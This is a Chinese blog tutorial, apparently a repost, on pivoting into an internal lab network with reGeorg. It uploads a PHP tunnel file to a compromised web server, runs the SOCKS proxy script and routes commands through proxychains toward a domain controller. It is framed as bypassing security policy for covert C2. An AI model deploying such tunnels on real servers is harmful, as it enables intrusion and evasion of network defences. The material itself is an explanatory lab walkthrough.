内网穿透之reGeorge

admin 2021年11月23日07:59:32评论253 views字数 1091阅读3分38秒阅读模式

不为圣贤,便是禽兽;莫问收获,但问耕耘

一个资质平庸却努力上进的普通人,我希望当我回首往事时,不因虚度年华而悔恨,也不因碌碌无为而羞愧,我可以对自己说:我不负此生。

0x00 前言

构建内网隐蔽通道,从而突破各种安全策略限制,实现对目标服务器的完美控制。
当我们从外网成功获得攻击点的时候,通过反弹shell、端口转发、内网穿透等技巧,来进一步入侵内网服务器。当我们取得内网目标服务器的控制权限,通过隧道技术绕过网络限制,实现隐蔽C2服务器的通信。
网络拓扑:
内网穿透之reGeorge
网络配置IP如下:
攻击机:
win10:192.168.1.6
kali:192.168.1.7

靶场:
VM1:对外边界服务器,win7
192.168.52.143
192.168.1.5

VM2:域成员,2003
192.168.52.141

VM3:域控,2008
192.168.52.138

0x01 reGeorge

1.1 环境

攻击机kali
reGeorge软件
运行程序需要的环境:
Python、pip、urllib3;

1.2 部署配置

上传tunnel.nosocket.php
前提条件,已获得跳板机的权限(都打到内网了,跳板机的权限肯定获得了),server-bt系统的跳板机是php环境,将reGeorge中的tunnel.nosocket.php上传至网站
内网穿透之reGeorge
并访问
http://192.168.1.5/tunnel.nosocket.php
访问成功
内网穿透之reGeorge
启动reGeorg
python reGeorgSocksProxy.py -p 1090 -u http://192.168.1.5/tunnel.nosocket.php
表示本地1090端口的流量都转发给指定的那个url,1090是指定的监听端口;
内网穿透之reGeorge
配置代理
然后配置proxychains代理链的配置文件vim /etc/proxychains.conf,将代理设置成本机的1090端口:socks5 127.0.0.1 1090
内网穿透之reGeorge

1.3 测试

命令前面加上proxychains 运行命令,(跳板机php环境已启动,存在主页index.php)
proxychains curl 
http://192.168.52.143
内网穿透之reGeorge
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:进德修业行道 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(进德修业行道):内网穿透之reGeorge

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月23日07:59:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网穿透之reGeorgehttps://cn-sec.com/archives/566838.html

发表评论

匿名网友 填写信息